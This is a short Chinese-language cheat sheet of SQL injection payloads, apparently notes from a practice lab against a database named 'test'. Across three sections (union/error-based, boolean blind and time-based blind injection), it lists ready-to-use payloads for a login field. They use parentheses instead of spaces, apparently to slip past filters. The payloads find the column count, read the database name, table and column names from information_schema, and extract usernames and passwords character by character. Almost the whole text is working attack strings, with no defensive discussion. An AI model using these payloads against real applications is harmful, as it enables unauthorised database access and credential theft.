数据库结构
数据库内容
1.报错注入
判断注入点
admin'and(1=1)#
admin'and(1=2)#
确定列数
admin'union(select(1),(2),(3))#
查询user
admin'union(select(1),(user()),(3))#
查询数据库名
admin'union(select(1),(database()),(3))#
查询表名
admin'union(select(table_name),(2),(3)from(information_schema.tables)where(table_schema=0x74657374))#
查询列名
admin'union((select(column_name),(2),(3)from(information_schema.columns)where(table_schema=0x74657374)and(table_name=0x75736572)))#
查询数据
admin'union(select(username),(password),(3)from(user))#
2.布尔盲注
确定列数
admin'union(select(1),(2),(3))#
确定数据库名长度
admin'and(length(database())=4)#
获取数据库第一位字符串,剩下的以此类推
admin'and(ascii(mid(database(),1,1))=116)#
获取表名
admin'and(select(ascii(mid(group_concat(table_name),1,1))=116)from(information_schema.columns)where(table_schema=0x74657374))#
获取字段名
admin'and(select(ascii(mid(group_concat(column_name),1,1))=73)from(information_schema.columns)where(table_schema=0x74657374)and(table_name=0x75736572))#
获取数据
admin'and(select(ascii(mid(group_concat(username),1,1))=97)from(user))#
3.时间盲注
获取数据库名称
admin'and(if((ascii(mid(database(),1,1))=116),sleep(5),0))#
获取表名
admin'and(if((select(ascii(mid(group_concat(table_name),1,1))=116)from(information_schema.columns)where(table_schema=0x74657374)),sleep(5),0))#
获取字段名
admin'and(if((select(ascii(mid(group_concat(column_name),1,1))=73)from(information_schema.columns)where(table_schema=0x74657374)and(table_name=0x75736572)),sleep(5),0))#
获取数据
admin'and(if((select(ascii(mid(group_concat(username),1,1))=97)from(user)),sleep(5),1))#